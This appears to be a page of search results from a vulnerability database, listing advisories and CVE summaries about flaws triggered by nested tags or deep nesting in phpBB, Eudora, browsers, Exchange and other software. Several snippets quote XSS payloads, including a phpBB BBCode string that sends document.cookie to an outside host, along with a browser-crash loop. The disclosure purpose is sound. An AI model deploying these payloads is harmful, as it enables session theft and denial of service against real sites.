4145 matches found
phpBB < 2.0.17 Nested BBCode URL Tags XSS
Binary data 3051.prm...
XSS in nested tag in phpbb 2.0.16
Hi all! Example: color=EFEFEFurlwww.uturl=www.s=''style='font-size:0;color:EFEFEF'styl e='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://antic hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=nullstyle='font-size:0;/u rl/url'/color More info: http://www.securitylab.ru/55612.html and...
phpBB < 2.0.17 Nested BBCode URL Tags XSS
According to its banner, the remote host is running a version of phpBB that fails to sanitize BBCode containing nested URL tags, which enables attackers to cause arbitrary HTML and script code to be executed in a user's browser within the context of the affected site. %NASLMINLEVEL 70300 C Tenabl...
CVE-2005-1665
The VIEWSTATE functionality in Microsoft ASP.NET 1.x, when not cryptographically signed, allows remote attackers to cause a denial of service CPU consumption via deeply nested markup...
CVE-2005-1043
exif.c in PHP before 4.3.11 allows remote attackers to cause a denial of service memory consumption and crash via an EXIF header with a large IFD nesting level, which causes significant stack recursion...
Mozilla SuiteFirefoxThunderbird - Nested Anchor Tag Status Bar Spoofing
Mozilla SuiteFirefoxThunderbird - Nested Anchor Tag Status Bar Spoofing source: https://www.securityfocus.com/bid/12798/info Mozilla Suite/Firefox and Thunderbird are reported prone to a URI obfuscation weakness. The issue is reported to manifest when 'Save Link As...' functionality is invoked on...
Microsoft Exchange 2003 multiple nested folders DoS
Renaming or moving folder with large number of sub-folder causes service to stop...
ExBB Nested BBcode XSS
Binary data 2546.prm...
XSS in the nested BB tag in many forum
XSS was found in the nested BB tag in many forum: Invision Power Board: COLOR=IMGhttp://aaa.aa/=aaa.jpg/IMG style=background:urljavascript:alert /COLOR vBulletin EMAIL=URL=s [email protected]:[email protected] sssssss/URL/EMAIL style=background:urljavaSCrip t:alert/HifromAlgol/ using tab between...
CVE-2004-1198
Microsoft Internet Explorer allows remote attackers to cause a denial of service application crash from memory consumption, as demonstrated using Javascript code that continuously creates nested arrays and then sorts the newly created arrays...
Multiple Browsers Nested Array sort() Loop Stack Overflow Exception
Exploit for unknown platform in category dos / poc =================================================================== Multiple Browsers Nested Array sort Loop Stack Overflow Exception =================================================================== a = new Array; while 1 a = new Arraya.sort; ...
Mandrake Linux Security Advisory : kernel (MDKSA-2001:082-1)
Rafal Wojtczuk found a vulnerability in the 2.2.19 and 2.4.11 Linux kernels with the ptrace code and deeply nested symlinks spending an arbitrary amount of time in the kernel code. The ptrace vulnerability could be used by local users to gain root privilege, the symlink vulnerability could result...
eudora61.pl
Eudora 6.1 on Windows is evil - have tested "Light Mode" free only so far, do not know if "Sponsored Mode" or "Paid Mode" would be any different. Do not use: stay away from Eudora, or maybe use version 6.0.3. --- Attachment spoof, LaunchProtect:...
Norton AntiVirus nested file manual scan bypass.....
Product Version: Norton Antivirus 2002 Only tested On... Risk Impact: Medium Vendor Status: No responce! Summary: If you manage to inject a file in the sub-directorys; beyond windows OS can create normally, say in 130 'th + sub-directory at c:..........upto 130'th ... NAV fails to scan the NESTED...
Eudora 6.0.3 nested MIME DoS
Eudora 6.0.3 for Windows will crash if sent a MIME message nested more than 2000 levels deep. Due to the presence of the EudoraDirspool.RCV file, users may find it difficult to recover from this DoS situation. Demo below. Cheers, Paul Szabo - [email protected]...
Eudora nested MIME DoS
Crash on deeply nested MIME attachment...
DoS против OWA в Exchange (nested request)
Запрос с большим уровнем вложенности приводит к высокому потреблению процессорного времени...
CVE-2001-0519
Aladdin eSafe Gateway versions 2.x allows a remote attacker to circumvent HTML SCRIPT filtering via a special arrangement of HTML tags which includes SCRIPT tags embedded within other SCRIPT tags...
CVE-2001-1113
Buffer overflow in TrollFTPD 1.26 and earlier allows local users to execute arbitrary code by creating a series of deeply nested directories with long names, then running the ls -R recursive command...
CVE-2000-0829
The affected software is the tmpwatch utility in Red Hat Linux. The vulnerability arises because it forks a new process for each directory level when scanning /tmp or /var/tmp , enabling a local attacker to create deeply nested directories and trigger a denial of service . Exploitation details ar...